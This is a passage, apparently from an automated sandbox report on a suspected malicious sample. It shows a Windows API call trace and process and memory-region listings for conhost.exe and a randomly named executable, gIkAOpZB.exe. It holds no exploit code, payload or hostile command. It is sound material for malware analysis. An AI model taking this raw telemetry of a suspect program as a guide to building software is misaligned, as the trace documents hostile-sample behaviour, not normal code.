_Dest="java/lang/Shutdown$Lock.class") returned="java/lang/Shutdown$Lock.class" [0134.998] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7efac, lpNewFilePointer=0x13cec280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cec280*=49803180) returned 1 [0134.998] ReadFile (in: hFile=0x134, lpBuffer=0x13cec2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13cec250, lpOverlapped=0x0 | out: lpBuffer=0x13cec2d0*, lpNumberOfBytesRead=0x13cec250*=0x1e, lpOverlapped=0x0) returned 1 [0135.002] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7efe7, lpNewFilePointer=0x13cec2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cec2e0*=49803239) returned 1 [0135.002] ReadFile (in: hFile=0x134, lpBuffer=0x1224eb00, nNumberOfBytesToRead=0x12a, lpNumberOfBytesRead=0x13cec2b0, lpOverlapped=0x0 | out: lpBuffer=0x1224eb00*, lpNumberOfBytesRead=0x13cec2b0*=0x12a, lpOverlapped=0x0) returned 1 [0135.002] free (_Block=0x12ddabf0) [0135.003] free (_Block=0x12e5f830) [0135.057] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="WaitMessage") returned 0x7ffb60b42020 [0135.057] WaitMessage () returned 1 [0135.058] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="PeekMessageW") returned 0x7ffb60b2c670 [0135.058] PeekMessageW (in: lpMsg=0x13cef5e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x13cef5e0) returned 1 [0135.059] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="CallNextHookEx") returned 0x7ffb60b26150 [0135.059] CallNextHookEx (hhk=0x60207, nCode=0, wParam=0x1, lParam=0x13cef4f8) returned 0x0 [0135.061] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="TranslateMessage") returned 0x7ffb60b250b0 [0135.061] TranslateMessage (lpMsg=0x13cef5e0) returned 0 [0135.061] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="DispatchMessageW") returned 0x7ffb60b20ae0 [0135.061] DispatchMessageW (lpMsg=0x13cef5e0) returned 0x0 [0135.061] GetCurrentThreadId () returned 0xe04 [0135.061] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0135.061] PeekMessageW (in: lpMsg=0x13cef5e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x13cef5e0) returned 0 [0135.062] WaitMessage () returned 1 [0150.765] PeekMessageW (in: lpMsg=0x13cef5e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x13cef5e0) returned 1 [0150.765] GetCurrentThreadId () returned 0xe04 [0150.766] GetCurrentThreadId () returned 0xe04 [0150.766] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="EnumThreadWindows") returned 0x7ffb60b266c0 [0150.766] EnumThreadWindows (dwThreadId=0xe04, lpfn=0x6f39b9f0, lParam=0x0) returned 1 [0150.766] SendMessageW (hWnd=0xb0220, Msg=0x111, wParam=0x2, lParam=0xb0220) returned 0x0 [0150.766] GetCurrentThreadId () returned 0xe04 [0150.766] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x111, wParam=0x2, lParam=0xb0220) returned 0x0 [0150.766] SendMessageW (hWnd=0xb0220, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0150.766] GetCurrentThreadId () returned 0xe04 [0150.766] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0150.766] SendMessageW (hWnd=0x50342, Msg=0x111, wParam=0x2, lParam=0x50342) returned 0x0 [0150.767] SendMessageW (hWnd=0x50342, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0150.767] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="PostMessageW") returned 0x7ffb60b29480 [0150.767] PostMessageW (hWnd=0xb0220, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0150.767] CallNextHookEx (hhk=0x60207, nCode=0, wParam=0x1, lParam=0x13cef4f8) returned 0x0 [0150.767] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="PostQuitMessage") returned 0x7ffb60b395e0 [0150.767] PostQuitMessage (nExitCode=-1) [0150.768] GetCurrentThreadId () returned 0xe04 [0150.768] GetCurrentThreadId () returned 0xe04 [0150.768] RtlTryEnterCriticalSection (CriticalSection=0x6f41e358) returned 1 [0150.768] GetProcAddress (hModule=0x7ffb612e0000, lpProcName="OleUninitialize") returned 0x7ffb612ea4d0 [0150.768] OleUninitialize () [0150.786] GetCurrentThreadId () returned 0xe04 [0150.786] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="GetMessageW") returned 0x7ffb60b32df0 [0150.786] GetMessageW (in: lpMsg=0x13cef5e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13cef5e0) returned 0 [0150.786] GetCurrentThreadId () returned 0xe04 [0150.786] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="IsWindow") returned 0x7ffb60b26d80 [0150.786] IsWindow (hWnd=0x0) returned 0 [0150.786] CallNextHookEx (hhk=0x60207, nCode=0, wParam=0x1, lParam=0x13cef548) returned 0x0 [0150.786] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="DestroyWindow") returned 0x7ffb60b43220 [0150.787] DestroyWindow (hWnd=0xb0220) returned 1 [0150.787] GetCurrentThreadId () returned 0xe04 [0150.787] GetCurrentThreadId () returned 0xe04 [0150.787] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0150.787] GetCurrentThreadId () returned 0xe04 [0150.787] GetCurrentThreadId () returned 0xe04 [0150.787] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0150.789] GetCurrentThreadId () returned 0xe04 [0150.789] GetCurrentThreadId () returned 0xe04 [0150.789] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0150.791] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="UnregisterClassW") returned 0x7ffb60b1c510 [0150.791] UnregisterClassW (lpClassName="SunAwtToolkit", hInstance=0x6f2d0000) returned 1 [0150.792] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="UnhookWindowsHookEx") returned 0x7ffb60b42c80 [0150.792] UnhookWindowsHookEx (hhk=0x60207) returned 1 [0150.792] free (_Block=0x12e2bfc0) [0150.792] ??3@YAXPEAX@Z () returned 0x1 [0150.792] CloseHandle (hObject=0x324) returned 1 Thread: id = 23 os_tid = 0xe10 Thread: id = 24 os_tid = 0xe14 Thread: id = 25 os_tid = 0xe7c Thread: id = 26 os_tid = 0xe9c Thread: id = 28 os_tid = 0xef0 [0150.756] GetCurrentThreadId () returned 0xef0 [0150.756] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="SendMessageW") returned 0x7ffb60b20560 [0150.756] SendMessageW (hWnd=0xb0220, Msg=0x9829, wParam=0x6f39a370, lParam=0x14acf610) returned 0x1 [0150.770] Sleep (dwMilliseconds=0x64) Thread: id = 29 os_tid = 0xef4 Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3485b000" os_pid = "0x1244" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1250" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 272 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 273 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 274 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 275 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 276 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 277 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 278 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 279 start_va = 0x7ff752060000 end_va = 0x7ff752070fff monitored = 0 entry_point = 0x7ff7520616b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 280 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 281 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 282 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 283 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 284 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 285 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 286 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 287 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 288 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 289 start_va = 0x6e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 290 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 291 start_va = 0x7ffb474f0000 end_va = 0x7ffb47548fff monitored = 0 entry_point = 0x7ffb474ffbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 292 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 293 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 294 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 295 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 296 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 297 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 298 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 299 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 300 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 301 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 302 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 303 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 304 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 305 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 306 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 307 start_va = 0x6e0000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 308 start_va = 0x8d0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 309 start_va = 0x8e0000 end_va = 0x1cdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 310 start_va = 0x1ce0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 311 start_va = 0x590000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 312 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 313 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 314 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 315 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 316 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 317 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 318 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 319 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 320 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 321 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 322 start_va = 0x1ce0000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 323 start_va = 0x1da0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 324 start_va = 0x1db0000 end_va = 0x20e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 325 start_va = 0x20f0000 end_va = 0x2308fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 326 start_va = 0x2310000 end_va = 0x2522fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 327 start_va = 0x2530000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 328 start_va = 0x2640000 end_va = 0x2851fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 329 start_va = 0x2860000 end_va = 0x2974fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 330 start_va = 0x870000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 331 start_va = 0x7ffb61430000 end_va = 0x7ffb61589fff monitored = 0 entry_point = 0x7ffb614738e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 332 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 333 start_va = 0x2980000 end_va = 0x2a3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002980000" filename = "" Region: id = 334 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 335 start_va = 0x7ffb5c200000 end_va = 0x7ffb5c221fff monitored = 0 entry_point = 0x7ffb5c201a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 336 start_va = 0x7ffb5c930000 end_va = 0x7ffb5c942fff monitored = 0 entry_point = 0x7ffb5c932760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 337 start_va = 0x7ffb5e080000 end_va = 0x7ffb5e0d5fff monitored = 0 entry_point = 0x7ffb5e090bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 338 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 339 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 340 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 341 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 342 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 343 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 344 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 345 start_va = 0x8b0000 end_va = 0x8b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 346 start_va = 0x2a40000 end_va = 0x2c35fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 347 start_va = 0x7ffb557f0000 end_va = 0x7ffb55a63fff monitored = 0 entry_point = 0x7ffb55860400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 348 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 349 start_va = 0x1ce0000 end_va = 0x1ce1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Region: id = 350 start_va = 0x1d90000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 351 start_va = 0x2c40000 end_va = 0x2d1cfff monitored = 0 entry_point = 0x2c9e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 352 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 353 start_va = 0x2c40000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 380 start_va = 0x2d40000 end_va = 0x2f3efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Thread: id = 2 os_tid = 0xf54 Thread: id = 3 os_tid = 0xf48 Thread: id = 4 os_tid = 0xebc Thread: id = 5 os_tid = 0x12d0 Process: id = "3" image_name = "gikaopzb.exe" filename = "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe" page_root = "0x79213000" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1250" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 443 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 444 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 445 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 446 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 447 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 448 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 449 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 450 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 451 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "gikaopzb.exe" filename = "\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe") Region: id = 452 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 453 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 454 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 455 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 456 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 457 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 458 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 459 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 460 start_va = 0x6ff50000 end_va = 